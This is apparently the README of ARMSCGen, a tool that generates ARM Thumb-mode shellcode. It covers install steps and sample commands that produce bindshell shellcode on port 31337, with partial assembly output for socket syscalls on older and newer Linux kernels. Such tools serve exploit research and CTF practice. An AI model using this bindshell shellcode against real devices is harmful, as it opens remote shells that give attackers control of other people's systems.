Ideas came from shell-storm and pwntools/pwnies.
Thanks to share all of brilliant sources on the net.
I'm interested in mobile platform and archtecture like Android on ARM, Router on MIPS and so on.
This project named ARMSCGen focus on shellcode on ARM Architecture especially ARMv7 Thumb Mode.
ARMSCGen highly depends on {capstone|keystone|unicorn}-engine.
Capstone is needed to disassemble codes. Install Capstone with:
$sudo pip install capstone
Keystone is needed to assemeble shellcodes. Install Keystone with:
$sudo pip install keystone-engine
or refers to here
Unicorn Engine is needed to emulate shellcodes. For installing Unicorn Engine, refers to here
$sudo python setup.py install
reads examples directory
and
uses scgen.py in CLI mode
please refer to shellcodes_lists.md or scgen -l -a all
Some of thumb mode shellcodes have new option named version.
If you'd like to test shellcodes on old kernel like 2.x then
try to use this option. for example
# linux kernel 2.4 - socketcall
$ scgen -a thumb bindshell 31337 4 2 0 -f a
/* socketcall( socket, { 2, 1, 6 } ) */
movs r1, #2
movs r2, #1
movs r3, #6
push {r1-r3}
movs r0, #1
mov r1, sp
movs r7, #102
svc 1
# linux kernel 3.x or later
$ scgen -a thumb bindshell 31337 4 3 0 -f a
/* socket(...) */
movs r0, #2
movs r1, #1
subs r2, r2, r2
subs r7, r7, r7
adds r7, r7, #255
adds r7, r7, #26
svc 1
(need to upgrade) URL: http://armscgen.readthedocs.org/ or /docs/ in source
writes shellcodes precisely and writes docs in detail
(To be continued)